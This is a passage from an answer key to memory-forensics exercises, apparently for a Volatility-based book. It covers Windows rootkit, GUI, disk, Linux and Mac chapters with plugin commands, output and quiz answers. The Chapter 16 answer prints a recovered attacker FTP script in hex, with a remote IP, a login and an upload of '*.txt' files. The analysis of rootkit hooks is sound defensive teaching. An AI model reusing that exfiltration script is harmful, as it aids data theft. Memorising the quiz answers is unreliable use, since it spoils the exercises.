------ ETHREAD: 0xff2674a0 Pid: 4 Tid: 1720 Tags: OrphanThread,SystemThread Created: 2010-08-15 19:26:13 UTC+0000 Exited: 1970-01-01 00:00:00 UTC+0000 Owning Process: System Attached Process: System State: Waiting:DelayExecution BasePriority: 0x8 Priority: 0x8 TEB: 0x00000000 StartAddress: 0xf2edc54e UNKNOWN ServiceTable: 0x80552180 [0] 0x80501030 [1] 0x00000000 [2] 0x00000000 [3] 0x00000000 Win32Thread: 0x00000000 CrossThreadFlags: PS_CROSS_THREAD_FLAGS_SYSTEM 0xf2edc54e 803d682aeff200 CMP BYTE [0xf2ef2a68], 0x0 0xf2edc555 744e JZ 0xf2edc5a5 0xf2edc557 56 PUSH ESI 0xf2edc558 57 PUSH EDI 0xf2edc559 be9ac3edf2 MOV ESI, 0xf2edc39a 0xf2edc55e bfecc3edf2 MOV EDI, 0xf2edc3ec 0xf2edc563 ff DB 0xff 0xf2edc564 35 DB 0x35 0xf2edc565 b4 DB 0xb4 ------ ETHREAD: 0x80f334a8 Pid: 4 Tid: 1992 Tags: OrphanThread,SystemThread Created: 2010-08-15 19:26:13 UTC+0000 Exited: 1970-01-01 00:00:00 UTC+0000 Owning Process: System Attached Process: System State: Waiting:DelayExecution BasePriority: 0x8 Priority: 0x8 TEB: 0x00000000 StartAddress: 0xf2edba46 UNKNOWN ServiceTable: 0x80552180 [0] 0x80501030 [1] 0x00000000 [2] 0x00000000 [3] 0x00000000 Win32Thread: 0x00000000 CrossThreadFlags: PS_CROSS_THREAD_FLAGS_SYSTEM 0xf2edba46 803d542aeff200 CMP BYTE [0xf2ef2a54], 0x0 0xf2edba4d 745e JZ 0xf2edbaad 0xf2edba4f 53 PUSH EBX 0xf2edba50 8b1d0ce1edf2 MOV EBX, [0xf2ede10c] 0xf2edba56 56 PUSH ESI 0xf2edba57 57 PUSH EDI 0xf2edba58 bf3eb9edf2 MOV EDI, 0xf2edb93e 0xf2edba5d be DB 0xbe All of the StartAddress fields tell you where the rootkit code exists. There is a suspiciously named driver: $ python vol.py -f sample008.bin driverscan Volatility Foundation Volatility Framework 2.4 (Beta) Offset(P) #Ptr #Hnd Start Size Service Key Name Driver Name ------------------ -------- -------- ---------- ---------- -------------------- ------------ ----------- 0x0000000001058388 4 0 0xfc76b000 0x6b00 Fdc Fdc \Driver\Fdc 0x0000000001058e28 4 0 0xfc93b000 0x3c80 serenum serenum \Driver\serenum 0x0000000001059258 4 0 0xfc54b000 0xfd80 Serial Serial \Driver\Serial 0x00000000010593e8 4 0 0xfc121000 0x13900 Parport Parport \Driver\Parport 0x000000000106fca0 3 0 0xf3a85000 0x20f00 IpNat IpNat \Driver\IpNat 0x000000000108ef38 2 0 0x00000000 0x0 tmryq....sys [snip] Unfortunately the driver start and size have been zeroed (potentially for anti-dumping). The filescan plugin shows the original path to the driver: $ python vol.py -f sample008.bin filescan | grep tmr Volatility Foundation Volatility Framework 2.4 (Beta) 0x0000000001094ea0 1 0 R--r-d \Device\HarddiskVolume1\WINDOWS\system32\drivers\tmryqyrznr2.sys You can extract a copy with dumpfiles: $ python vol.py -f sample008.bin dumpfiles -Q 0x0000000001094ea0 -D . --name Volatility Foundation Volatility Framework 2.4 (Beta) ImageSectionObject 0x01094ea0 None \Device\HarddiskVolume1\WINDOWS\system32\drivers\tmryqyrznr2.sys DataSectionObject 0x01094ea0 None \Device\HarddiskVolume1\WINDOWS\system32\drivers\tmryqyrznr2.sys 5. Analyze sample007.bin: A) Does this rootkit work by hooking IRP functions or using layered devices? B) What functionality or capabilities can you uncover? C) Are any of the kernel modules digitally signed? D) Does the rootkit install any callbacks or timers? E) Extract the rootkit code, fix the PE header (if necessary), and load into IDA Pro. Label the malicious functions based on addresses you see in the answers to A and D. The correct answer is: (this memory image is infected with stuxnex, you can read about the artifacts here: http://mnin.blogspot.com/2011/06/examining-stuxnets-footprint-in-memory.html) ---------------------------------------------------------------------- Chapter 14: Windows GUI Subsystem, Part I ---------------------------------------------------------------------- 1. Perform the following steps: A) Configure one of your virtual machines with multiple users B) Log onto the console with one user account and RDP with another user account C) Acquire a memory dump from the system D) Run the screenshots plugin. Do you see each user's desktop? E) Run the session plugin. Can you tell which user is logged in via RDP? The correct answer is: To answer E, look at which session has rdpclip.exe and RDPDD.dll running. Then use the getsids plugin to translate the SIDs of those processes to a user name. 2. Perform the following steps: A) Launch Sysinternals Desktops and create some additional desktops B) Execute some applications on each desktop C) Use WinLister or Spy++ on your main desktop. Can you see the windows in other desktops? D) Run the desktops Volatility plugin. Do you see the new desktops? Are the proper threads/processes associated with the proper desktops? E) Run the windows and wintree plugins. The correct answer is: Using WinLister or Spy++ will not show the windows on other desktops. 3. Analyze sample007.bin. A) Which window is monitoring USB insertions? B) What is the address of the malicious window procedure? C) What is the window's class atom (integer) value? D) Run the atoms or atomscan plugin. Do you see the class atom string? The correct answer is: AFX64c313. See the "Artifact 17 and 18: Windows & Classes" section of http://mnin.blogspot.com/2011/06/examining-stuxnets-footprint-in-memory.html ---------------------------------------------------------------------- Chapter 15: Windows GUI Subsystem, Part II ---------------------------------------------------------------------- 1. Perform the following steps on sample009.bin: A) Run the messagehooks plugin. Are there any global hooks? B) What type of messages are being filtered/hooked? C) What is the full path to the injected hook DLL? D) What is the address of the hook handler function inside the DLL? E) Extract the malicious DLL and analyze the handler in IDA Pro. What is the purpose of the hook? The correct answer is: Yes, the hooks are global (HF_GLOBAL flag). The WH_GETMESSAGE is being filtered. The DLL is on the "Mal Ware" user's desktop. The hook address is at RVA 0x00001fd9. You can dump the DLL with dlldump and then load it in IDA Pro and go to address BASE + 0x00001fd9. The function just calls CallNextHookEx (no payload, it just exists to inject the DLL into the target processes). $ python vol.py -f sample009.bin messagehooks Volatility Foundation Volatility Framework 2.4 (Beta) Offset(V) Sess Desktop Thread Filter Flags Function Module ---------- ------ -------------------- ------------------------------ -------------------- -------------------- ---------- ------ 0xbc693988 0 WinSta0\Default WH_GETMESSAGE HF_ANSI, HF_GLOBAL 0x00001fd9 C:\Documents and Settings\Mal Ware\Desktop\Dll.dll 0xbc693988 0 WinSta0\Default 384 (KernelDrv.exe 352) WH_GETMESSAGE HF_ANSI, HF_GLOBAL 0x00001fd9 C:\Documents and Settings\Mal Ware\Desktop\Dll.dll 0xbc693988 0 WinSta0\Default 2024 (lanmanwrk.exe 920) WH_GETMESSAGE HF_ANSI, HF_GLOBAL 0x00001fd9 C:\Documents and Settings\Mal Ware\Desktop\Dll.dll 0xbc693988 0 WinSta0\Default 1392 (lanmanwrk.exe 920) WH_GETMESSAGE HF_ANSI, HF_GLOBAL 0x00001fd9 C:\Documents and Settings\Mal Ware\Desktop\Dll.dll 0xbc693988 0 WinSta0\Default 1584 (explorer.exe 1624) WH_GETMESSAGE HF_ANSI, HF_GLOBAL 0x00001fd9 C:\Documents and Settings\Mal Ware\Desktop\Dll.dll 0xbc693988 0 WinSta0\Default 252 (VMwareUser.exe 1768) WH_GETMESSAGE HF_ANSI, HF_GLOBAL 0x00001fd9 C:\Documents and Settings\Mal Ware\Desktop\Dll.dll 2. Perform the following steps on your own virtual machine: A) Copy message_hook_installer.exe and message_hooklib.dll to your machine B) Double-click the exe file C) Acquire a memory dump D) Perform the same steps as question #1 The correct answer is: N/A 3. Perform the following steps on your own virtual machine: A) Copy some text to your clipboard B) Copy a file from Windows Explorer C) Acquire a memory dump D) Run the clipboard plugin. Do you see what you expect? The correct answer is: N/A ---------------------------------------------------------------------- Chapter 16: Disk Artifacts in Memory ---------------------------------------------------------------------- 1. Run the mftparser plugin against some of your memory dumps. Collect the output in body file format and build a timeline. What were the most recently accessed and created files? You can do this like: $ python vol.py -f MEMORY.DMP --profile=PROFILE mftparser --output=body --output-file=body.txt $ mactime -b body.txt -d -z UTC > timeline.txt 2. Analyze sample004.bin with mftparser. Specifically, extract the MFT-resident file data. Can you find any attacker scripts? f.txt: MFT entry found at offset 0x15938800 Type: In Use & File Record Number: 12030 Number of fixup array vals 3 Link count: 1 Sequence Value: 0x3 Fixup Array: 0x9 0x0 0x0 $STANDARD_INFO Creation Modified MFT Altered Access Date Type -------------------- -------------------- -------------------- -------------------- ---- 2012-04-28 02:01:43 2012-04-28 02:01:43 2012-04-28 02:01:43 2012-04-28 02:01:43 Archive $FILE_NAME Creation Modified MFT Altered Access Date Name/Path -------------------- -------------------- -------------------- -------------------- --------- 2012-04-28 02:01:43 2012-04-28 02:01:43 2012-04-28 02:01:43 2012-04-28 02:01:43 f.txt Full Path: WINDOWS\system32\systems\f.txt $DATA 0x00000000: 7b 00 00 00 18 00 00 00 6f 70 65 6e 20 36 36 2e {.......open.66. 0x00000010: 33 32 2e 31 31 39 2e 33 38 0d 0a 6a 61 63 6b 0d 32.119.38..jack. 0x00000020: 0a 32 61 77 65 73 30 6d 65 0d 0a 6c 63 64 20 63 .2awes0me..lcd.c 0x00000030: 3a 5c 57 49 4e 44 4f 57 53 5c 53 79 73 74 65 6d :\WINDOWS\System 0x00000040: 33 32 5c 73 79 73 74 65 6d 73 0d 0a 63 64 20 20 32\systems..cd.. 0x00000050: 2f 68 6f 6d 65 2f 6a 61 63 6b 0d 0a 62 69 6e 61 /home/jack..bina 0x00000060: 72 79 0d 0a 6d 70 75 74 20 22 2a 2e 74 78 74 22 ry..mput."*.txt" 0x00000070: 0d 0a 64 69 73 63 6f 6e 6e 65 63 74 0d 0a 62 79 ..disconnect..by 0x00000080: 65 0d 0a 00 00 00 00 00 e....... For more information, see http://volatility-labs.blogspot.com/2012/10/solving-grrcon-network-forensics.html 3. Create one or more ADS files on your system. Acquire memory and run mftparser. Does it find the ADS associations? The correct answer is: N/A 4. Move a file on your machine to the recycle bin. Then analyze your activity with mftparser. Can you find evidence of the "deleted" file? Parse the $I file and recover the original full path. The correct answer is: N/A 5. Extract all files from one or more memory dumps. Run the UNIX "file" command against the output directory. What types of files did you recover? You can do this like: $ mkdir output $ python vol.py -f MEMORY.DMP --profile=PROFILE -D output dumpfiles $ file output/* 6. Perform the following steps: A) Install Truecrypt on your machine B) Create a virtual file-based container C) Mount the container with or without cached passwords D) Store some files within the encrypted container E) Acquire a memory dump from your system F) Use the truecryptpassphrase, truecryptsummary, and truecryptmaster plugins to investigate the activity The correct answer is: N/A 7. Assuming your Truecrypt file was using NTFS, locate the $Mft file and extract it with dumpfiles. Parse it offline to determine the names of other files within the encrypted volume. You can find the $Mft entries with filescan or from the output of truecryptsummary. $ python vol.py -f MEMORY.DMP --profile=PROFILE filescan | grep Mft Then pass the physical offset as -Q to dumpfiles. ---------------------------------------------------------------------- Chapter 17: Event Reconstruction ---------------------------------------------------------------------- 1. Extract strings from one or more of your memory dumps. For example: $ strings -a -td MEMORY.DMP > strings.txt $ strings -a -el -td MEMORY.DMP >> strings.txt 2. Translate the strings with Volatility. For example: $ python vol.py -f MEMORY.DMP --profile=PROFILE strings -s strings.txt > translated.txt 3. Search your translated strings file for activity related to file execution (prefetch), C2 hostnames (this will depend on the malware you install prior to dumping memory), etc. The correct answer is: N/A 4. Are there any related strings immediately above or below the potentially interesting strings you found in Step 3? The correct answer is: N/A (hint: use grep -C, grep -A, or grep -B) 5. Isolate the "FREE MEMORY" strings from the translated file. What percentage of the total strings are found in free/deallocated memory? The correct answer is: N/A 6. What strings are shared between multiple processes? Can you map them back to specific DLLs in those processes? The correct answer is: N/A (hint: the shared strings will have multiple process IDs in the translated.txt file) 7. Run the cmdscan and consoles plugins against all samples provided with the book as well as your own memory images. Do you find any useful information? The correct answer is: N/A ---------------------------------------------------------------------- Chapter 18: Timelining ---------------------------------------------------------------------- 1. Most timelines found in Windows memory dumps are in local time. True or False? The correct answer is: False (they are in UTC) 2. Which command-line option helps create timelines in a format that's compatible with disk forensics tools and other common utilities? A) --output=timeline B) --output=csv C) --output=body D) --output=bodyfile The correct answer is: C 3. Create a timeline from sample001.bin. A) Run timeliner B) Run shellbags C) Run mftparser D) Extract the registry hive files and process them with python-registry E) Combine the output into one large timeline F) Sort the timeline with mactime The correct answer is: N/A 4. Analyze the timeline you created in Question 3 for signs of infection. What was the initial infection vector and when did it occur? What events followed? See the answer to the next question. 5. Create a timeline for sample005.bin. Can you find any relation with sample001.bin? Both sample001.bin and sample005.bin are memory images produced by Jack Crook for his forensic challenge. The sample001.bin is the "ENG" machine and sample005.bin is "IIS." Now read through Chapter 18's analysis of the involved systems and see if they confirm your own suspicions. --------------------------------------------------------------- Chapter 19: Linux Memory Acquisition --------------------------------------------------------------- 1. Why is /dev/mem no longer usable for memory acquisition? A) It is disabled on modern distributions B) It only supports acquisition of 1MB of memory C) It only supports acquisition of 2GB of memory D) It is not readable by userland programs The correct answer is: B 2. Why is /dev/kmem no longer usable for memory acquisition? A) It is disabled on modern distributions B) It only supports acquisition of 1MB of memory C) It only supports acquisition of 2GB of memory D) It is not readable by userland programs The correct answer is: A 3. What is one advantage that LiME has over fmem? A) It runs from userland B) It can be compiled once and work on any supported system C) It is open source D) It automates the acquisition process The correct answer is: D 4. On which of the following system(s) would /proc/kcore be usable? A) 32-bit Redhat running kernel version 2.6.32 B) 64-bit Ubuntu running kernel version 2.6.24 C) 32-bit Mandriva running kernel version 2.6.21 D) 64-bit SuSe running kernel version 3.12 The correct answer is: B, D 5. In order to create a Volatility Linux profile you must compile the profile on a system running the same kernel version and OS as you want to analyze. True/False? The correct answer is: False (you can cross-compile) 6. Perform the following steps: A) Install the latest version of Ubuntu within a virtual machine or on real hardware B) Compile LiME for the system and create a Volatility profile. This will require installing the compiler tools and the kernel headers C) Use LiME to acquire memory and then analyze it with the linux_pslist plugin using the profile you created The correct answer is: N/A --------------------------------------------------------------- Chapter 20: Linux Operating System --------------------------------------------------------------- 1. Which of the following dictate the sections of an ELF file load into memory at runtime? A) The ELF header B) The section headers C) The program headers D) The section symbol table The correct answer is: C 2. How does Volatility's Linux support find the initial DTB? A) Scanning physical memory looking for an allocation signature B) Utilizing Linux's identity mapping of kernel code and data C) Finding the init process and then finding its page table value D) Walking the list of kernel modules until the kernel is found and then finding its page table value The correct answer is: B 3. The proc file system is correctly acquired when performing disk imaging, such as through the dd command. True/False? The correct answer is: False (/proc is a memory-only file system) 4. The /proc/1/ directory corresponds to which type of object? A) Process B) Network Connection C) Opened File Handles D) Kernel Module The correct answer is: A 5. Analyze /bin/ls from the Ubuntu installation that you created in the previous chapter. Using readelf -WS and nm, answer the following questions: A) How many sections does the binary have? B) How many symbols does the binary contain? C) What is the virtual address of the .text section? The correct answer can be determined by using nm (or readelf -Ws) to read the file's symbols and readelf -WS to read the sections. For example, in the following output you can see each section and where it is loaded: $ readelf -WS /bin/ls There are 28 section headers, starting at offset 0x1b670: Section Headers: [Nr] Name Type Address Off Size ES Flg Lk Inf Al [ 0] NULL 0000000000000000 000000 000000 00 0 0 0 [ 1] .interp PROGBITS 0000000000400238 000238 00001c 00 A 0 0 1 [ 2] .note.ABI-tag NOTE 0000000000400254 000254 000020 00 A 0 0 4 [ 3] .note.gnu.build-id NOTE 0000000000400274 000274 000024 00 A 0 0 4 [ 4] .hash HASH 0000000000400298 000298 000370 04 A 6 0 8 [ 5] .gnu.hash GNU_HASH 0000000000400608 000608 000060 00 A 6 0 8 [ 6] .dynsym DYNSYM 0000000000400668 000668 000b58 18 A 7 1 8 [ 7] .dynstr STRTAB 00000000004011c0 0011c0 000568 00 A 0 0 1 [ 8] .gnu.version VERSYM 0000000000401728 001728 0000f2 02 A 6 0 2 [ 9] .gnu.version_r VERNEED 0000000000401820 001820 0000a0 00 A 7 3 8 [10] .rela.dyn RELA 00000000004018c0 0018c0 000078 18 A 6 0 8 [11] .rela.plt RELA 0000000000401938 001938 0009d8 18 A 6 13 8 [12] .init PROGBITS 0000000000402310 002310 00000e 00 AX 0 0 4 [13] .plt PROGBITS 0000000000402320 002320 0006a0 10 AX 0 0 16 [14] .text PROGBITS 00000000004029c0 0029c0 01022c 00 AX 0 0 16 [15] .fini PROGBITS 0000000000412bec 012bec 000009 00 AX 0 0 4 --------------------------------------------------------------- Chapter 21: Processes and Process Memory --------------------------------------------------------------- 1. The linux_pstree plugin is helpful in which situation? A) Finding hidden processes B) Determining when processes exited C) Mapping processes to network connections D) Determining the child/parent relationship between processes The correct answer is: D 2. The name of the process reported by linux_pslist is susceptible to userland manipulation. True/False? The correct answer is: False (the name is stored in kernel memory) 3. The name of the process reported by linux_psaux is susceptible to userland manipulation. True/False? The correct answer is: True (this value comes from the process' address space) 4. What does the PATH environment variable specify? A) The list of directories writable by the user B) The list of directories to search for applications C) The list of directories to search for shared libraries D) The list of directories storing user configuration files The correct answer is: B 5. When using default settings, which of these appear in bash's data structures in memory, but not on disk? A) The order in which commands were executed B) The time when commands were executed C) The user who executed commands D) The directory commands were executed from The correct answer is: B 6. For the remaining questions of this chapter, analyze linux-sample-1.bin using the provided profile. A) What is the ID of the user that read the passwd and shadow file? B) Did this user log in locally or over SSH? C) Which parameters were passed to the command when first elevating privileges (hint: check the environment of the relevant process)? D) What is the user ID of the user logged into the desktop locally? E) Which network services are running on the system? Answers: If you run the linux_bash plugin you see that a PID of 8503 had read both files: $ python vol.py -f linux-sample-1.bin --profile=Linuxbookx64 linux_bash Volatility Foundation Volatility Framework 2.4 Pid Name Command Time Command -------- -------------------- ------------------------------ ------- 8503 bash 2014-06-24 13:00:12 UTC+0000 cat /etc/passwd 8503 bash 2014-06-24 13:00:17 UTC+0000 cat /etc/group If you look up that process with pslist you can see that the user ID (UID) is 1001: $ python vol.py -f linux-sample-1.bin --profile=Linuxbookx64 linux_pslist -p 8503 Volatility Foundation Volatility Framework 2.4 (Beta) Offset Name Pid Uid Gid DTB Start Time ----------------- ----- --- --- --- --------- ---------- 0xffff88001ac9c740 bash 8503 1001 1001 0x1ee6000 2014-06-24 12:58:55 UTC+0000 linux_pstree shows that sshd is the parent of the bash process with PID 8503: $ python vol.py -f linux-sample-1.bin --profile=Linuxbookx64 linux_pstree .sshd 3373 0 ..sshd 8497 0 ...sshd 8502 1001 ....bash 8503 1001 linux_bash shows the use of ‘su' a few seconds before the shadow file is read: $ python vol.py -f linux-sample-1.bin --profile=Linuxbookx64 linux_pstree 8503 bash 2014-06-24 13:00:02 UTC+0000 su The user ID of the local user is 1000 as shown by linux_pslinux. Apache2, smbd, exim, and dovecot are all actively listening on the network. --------------------------------------------------------------- Chapter 22: Networking Artifacts --------------------------------------------------------------- 1. Activity related to UNIX sockets would appear in a program such as Wireshark running on the local machine. True/False The correct answer is: False (Wireshark does not analyze UNIX sockets) 2. Raw sockets are used only for malicious purposes. True/False The correct answer is: False 3. Why is the ARP cache useful for forensics? A) It contains remote IP addresses of attackers B) It contains remote IP addresses used for data exfiltration C) It contains information about local IP addresses contacted during lateral movement D) It contains information about local IP addresses assigned to printers The correct answer is: C 4. Which networking artifact was removed from subsequent versions of the Linux kernel? A) Packet queues B) Aliased interfaces C) ARP cache D) Routing cache The correct answer is: D 5. For the remaining questions of this chapter, analyze linux-sample-2.bin using the provided profile. A) Which web browser was used by the user of the system? B) What was the PID of the main browser in use? C) Which IP addresses were contacted using HTTPS? D) What type of browsing activity does the route cache show? E) Which processes are listening for connections? F) How many network interfaces are active on the system? G) Are any of the interfaces in promiscuous mode? Answers: linux_pslist shows that the iceweaseal browser is running as PID 8700. To determine IP addresses contacted, you can filter linux_netstat with the –p option for 8700 and grep for port 443: $ python vol.py -f linux-sample-2.bin --profile=Linuxbookx64 linux_netstat -p 8700 | grep 443 Volatility Foundation Volatility Framework 2.4 (Beta) TCP 192.168.201.161:51499 74.125.228.36:443 ESTABLISHED iceweasel/8700 TCP 192.168.201.161:58610 206.190.56.190:443 ESTABLISHED iceweasel/8700 TCP 192.168.201.161:58615 206.190.56.190:443 ESTABLISHED iceweasel/8700 TCP 192.168.201.161:38091 74.125.228.59:443 ESTABLISHED iceweasel/8700 TCP 192.168.201.161:33011 93.184.216.146:443 ESTABLISHED iceweasel/8700 TCP 192.168.201.161:41442 91.190.218.18:443 ESTABLISHED iceweasel/8700 TCP 192.168.201.161:47616 173.252.112.23:443 ESTABLISHED iceweasel/8700 TCP 192.168.201.161:57400 74.125.228.60:443 ESTABLISHED iceweasel/8700 TCP 192.168.201.161:41488 23.59.244.47:443 ESTABLISHED iceweasel/8700 TCP 192.168.201.161:38180 168.143.241.160:443 ESTABLISHED iceweasel/8700 TCP 192.168.201.161:38181 168.143.241.160:443 ESTABLISHED iceweasel/8700 TCP 192.168.201.161:39245 74.125.29.95:443 ESTABLISHED iceweasel/8700 TCP 192.168.201.161:33851 74.125.228.42:443 ESTABLISHED iceweasel/8700 The linux_route_cache plugin with the –R option shows connections to several websites. To determine listening processes, use linux_netstat and grep for LISTEN. linux_ifconfig shows two active interfaces and that neither are in promiscuous mode: $ python vol.py -f linux-sample-2.bin --profile=Linuxbookx64 linux_ifconfig Volatility Foundation Volatility Framework 2.4 Interface IP Address MAC Address Promiscuous Mode ---------------- -------------------- ------------------ --------------- lo 127.0.0.1 00:00:00:00:00:00 False eth0 192.168.201.161 00:0c:29:8f:ed:ca False --------------------------------------------------------------- Chapter 23: Kernel Memory Artifacts --------------------------------------------------------------- 1. What type of information would NOT be found in the kernel debug buffer? A) User logins B) Removable device usage C) Wireless network activity D) Listings of attached hardware devices The correct answer is: A 2. The linux_lsmod plugin finds kernel modules through scanning physical memory. True/False? The correct answer is: False (it walks the linked list) 3. The Linux kernel uses a 2GB / 2GB split of virtual memory on 32-bit systems. True/False The correct answer is: False (it uses 3GB / 1GB) 4. What is NOT true of kernel modules extracted with linux_moddump? A) They can be scanned with AV and Yara signatures B) They can be reverse engineered C) They can be reloaded on the live system D) They will not match the hash of the original LKM from disk The correct answer is: C 5. module_addr_min and module_addr_max specify the beginning and ending address of which data in kernel memory? A) The kernel executable B) The last kernel module to load C) The memory range occupied by all kernel modules D) The last kernel module to unload The correct answer is: C 6. For the remaining questions of this chapter, analyze linux-sample-3.bin using the provided profile. A) At what address is the lime kernel module loaded? Use this address to dump the kernel module from memory B) How many sections does the module have? C) Where is the .text section loaded in memory? D) Which parameter(s) were passed to LiME to dump memory? E) Which physical addresses does RAM occupy? F) Did LiME acquire only these regions or others as well? linux_lsmod and linux_moddump can be used to acquire the module from memory: $ python vol.py -f linux-sample-3.bin --profile=Linuxbookx64 linux_lsmod | grep lime Volatility Foundation Volatility Framework 2.4 ffffffffa03b2010 lime 17991 $ python vol.py -f linux-sample-3.bin --profile=Linuxbookx64 linux_moddump -b 0xffffffffa03b2010 -D . Volatility Foundation Volatility Framework 2.4 Wrote 2053656 bytes to lime.0xffffffffa03b2010.lkm You can find the address of the .text section using readelf on the extracted module or with the –T parameter to linux_lsmod. The –P flag can be used to recover the parameters. The linux_iomem plugin lists the regions of physical memory. You can verify that LiME only acquired RAM regions by comparing linux_iomem with the output of the limeinfo plugin. --------------------------------------------------------------- Chapter 24: File Systems in Memory --------------------------------------------------------------- 1. What effect does the noatime mount option have on forensics? A) Access times of directories are not updated B) Access times of files are not updated C) Access times of files and directories are not updated D) Access times of files are updated only when accessed by the owner The correct answer is: C 2. When replicating file systems from memory, which MAC time is not replicated? A) Modified B) Accessed C) Created The correct answer is: C 3. Which of the following file systems is not stored on disk? A) tmpfs B) ext3 C) xfs D) jfs The correct answer is: A 4. Which of the following directories is often used by attackers to store data that does not need to persist across reboots? A) /usr/tmp B) /dev/mm C) /tmp D) /var/runlib The correct answer is: C 5. If one page of a file is accessed by an application, then the entire file is read into the file cache True/False? The correct answer is: False (only the required portion and potentially a small read-ahead chunk) 6. For the remaining questions of this chapter, analyze linux-sample-3.bin using the provided profile. A) Recover the cookies.sqlite file of the vol user. Which websites stored cookies on this user's system? B) How many entries are in /etc/hosts? C) What type of file is /home/vol/.cache/mozilla/firefox/sren9std.default/Cache/8/10/4B0E7d01? Answers: These files can all be recovered with linux_find_file or linux_recover_filesystem. An sqlite viewer can view the cookie database, a text editor can view the hosts file, and the file command reveals that the cache file is a picture. --------------------------------------------------------------- Chapter 25: Userland Rootkits --------------------------------------------------------------- 1. Which of the following operations is not directly supported by ptrace? A) Attaching to a running process B) Reading from a remote process' memory C) Creating a thread in a remote process D) Setting the general purpose registers of a remote process The correct answer is: C 2. How are LD_PRELOAD-based rootkits detected? A) By checking for inline hooks B) By hashing files on disk and comparing the hash to the in-memory version C) By checking for GOT overwrites D) By comparing string comparison operations The correct answer is: C 3. GOT overwrites are equivalent to which type of hook on Windows? A) SSDT hooks B) IAT/EAT hooks C) Callback hooks D) IDT hooks The correct answer is: B 4. For stability reasons, which set of instructions is generally overwritten by inline hooks? A) The first few instructions of a function B) The last few instructions of a function C) The instructions after the first CALL instruction D) The instructions after the first CMP instruction The correct answer is: A 5. Detection of which type of hook requires the original application binary or shared library? A) Inline hook B) GOT overwrite C) Process hollowing D) Function pointer overwrite The correct answer is: C 6. For the following questions analyze linux-sample-4.bin using the provided profile. A) Which processes are victim of an LD_PRELOAD attack? B) Which user is running the infected processes? C) What is the full path to the injected library? D) How does the library get injected into each process of the user? E) Which function(s) are the malicious library hooking? F) What is the path to the logfile that the library stores stolen data to disk in? Answer: linux_plthook can find processes infected with LD_PRELOAD. In particular it finds that the pico process (/bin/nano) has its fwrite function hooked by a library /home/mark/.bashinit. This library's place in the file system and name are both very suspicious. The library gets loaded into each process of the mark user through hijacking of the .bashrc file. The path to the logfile can be found by using linux_lsof on the infected process. 7. For the following questions analyze linux-sample-5.bin using the provided profile. A) Which process is inline hooked? B) Which function is inline hooked? C) What is the purpose of the inline hook? D) What is the name of the library performing the hook? Answer: linux_apihooks shows two results for the bash process with PID 3619: $ python vol.py -f linux-sample-5.bin --profile=Linuxbookx64 linux_apihooks Volatility Foundation Volatility Framework 2.4 Pid Name Hook VMA Hook Symbol Hooked Address Type Hook Address Hook Library ------- ---------------- ---------------------------------------- ------------------------ ------------------ ----- ------------------ ------------ 3619 bash /lib/x86_64-linux-gnu/libc-2.13.so time 0x00007f4429b45950 CALL 0x0000000000000000 3619 bash /lib/x86_64-linux-gnu/libc-2.13.so open 0x00007f4429b77f00 JMP 0x00007f44290708b0 /run/shm/b The first for the time function is a false positive, but the second shows that the open function is being redirected to a library named b that is stored within /run/shm. This is very suspicious. --------------------------------------------------------------- Chapter 26: Kernel Mode Rootkits --------------------------------------------------------------- 1. Legitimate system call handlers can be implemented in kernel modules. True/False? The correct answer is: False 2. Which of the following members of tcp4_seq_info is commonly hooked in order to hide a rootkit's network connections? A) start B) stop C) next D) show The correct answer is: D 3. The NF_REPEAT Netfilter option is often used by rootkits to hide network connections from other kernel components and userland packet sniffers. True/False? The correct answer is: False (they often use NF_STOLEN) 4. How does Average Coder hide logged-in users from the system? A) Hooking the write operation of /proc/buddyinfo B) Hooking the read operation of /var/run/utmp C) Hooking the read directory operation of /var/run D) Hooking the open operation of /usr/bin/who The correct answer is: B 5. Which userland-accessible source on a live system can find kernel modules hidden from the global list of modules? A) The IO_GET_MODULES I/O control request B) The /sys/module directory C) The /proc/modules file D) The get_modules system call The correct answer is: B 6. For the following questions analyze linux-sample-6.bin using the provided profile. A) Where is the malicious kernel module loaded? B) Which system calls are hooked? C) Which capabilities can the hooks give to the rootkit? D) What type of hooks are placed in the file system? E) Are there hooks in the network stack? Answers: The hidden module can be found with linux_check_modules: $ python vol.py -f linux-sample-6.bin --profile=Linuxbookx64 linux_check_modules Volatility Foundation Volatility Framework 2.4 Module Address Module Name ------------------ ------------------------ 0xffffffffa04280a0 ipsecs_kbeast_v1 linux_check_syscall can be used to find the hooked indexes: python vol.py -f /mnt/hgfs/Desktop/linux-sample-6.bin --profile=Linuxbookx64 linux_check_syscall Volatility Foundation Volatility Framework 2.4 Table Name Index System Call Handler Address Symbol ---------- ----- ------------------------ ------------------ ------------------------------------------------------------ 64bit 0 0xffffffffa04259b6 HOOKED: ipsecs_kbeast_v1/h4x_read 64bit 1 0xffffffffa04250e7 HOOKED: ipsecs_kbeast_v1/h4x_write 64bit 2 0xffffffffa042548f HOOKED: ipsecs_kbeast_v1/h4x_open linux_check_fop and linux_check_afinfo can be used to determine the file system and network stack hooks. $ python vol.py -f linux-sample-6.bin --profile=Linuxbookx64 linux_check_afinfo Volatility Foundation Volatility Framework 2.4 Symbol Name Member Address ------------------------------------------ ------------------------------ ------------------ tcp4_seq_afinfo show 0xffffffffa04255db --------------------------------------------------------------- Chapter 27: Case Study: Phalanx 2 --------------------------------------------------------------- 1. How does P2 hide processes? A) IOCTL handler hooks B) System call hooks C) Direct Kernel Object Manipulation (DKOM) D) Inline hooks in the libc mapped into each process The correct answer is: B 2. What was unusual about P2's network connections? A) P2 connected multiple times to a hardcoded remote IP addresses B) P2 connected to itself over the network C) P2 connected performed DNS resolution using Godaddy's DNS servers D) The connections occurred only over IPv6 The correct answer is: B 3. P2 performs the majority of its work through a loadable kernel module. True/False? The correct answer is: False (most occurs in user mode through /dev/mem) 4. Which directory does P2 use to mark its presence on a system? A) /tmp B) /var/run C) /dev/shm D) /etc The correct answer is: C 5. P2 re-executes itself upon startup so that it will not appear in the process list. True/False? The correct answer is: False (it re-executes to break from ptrace) ---------------------------------------------------------------------- Chapter 28: Mac Acquisition and Internals ---------------------------------------------------------------------- 1. On Mac systems, processes run in the Mach layer and the kernel runs in the BSD layer. True/False? The correct answer is: False (the kernel does not run in the BSD layer) 2. Why does Volatility need to account for the Mac kernel's address space layout randomization? A) Userland libraries will be mapped into different offsets than reported by the virtual memory subsystem structures B) Addresses in the profile will not correspond to where the data structures are mapped in the memory capture C) Scanning for data structures requires smarter algorithms when ASLR is in use D) Volatility does not need to account for it The correct answer is: B 3. Physical memory acquisition on Mac systems can be accomplished using built-in operating system facilities. True/False? The correct answer is: False (there is no supported built-in API for acquisition) 4. Mac Memory Reader supports capture to the ELF format. True/False? The correct answer 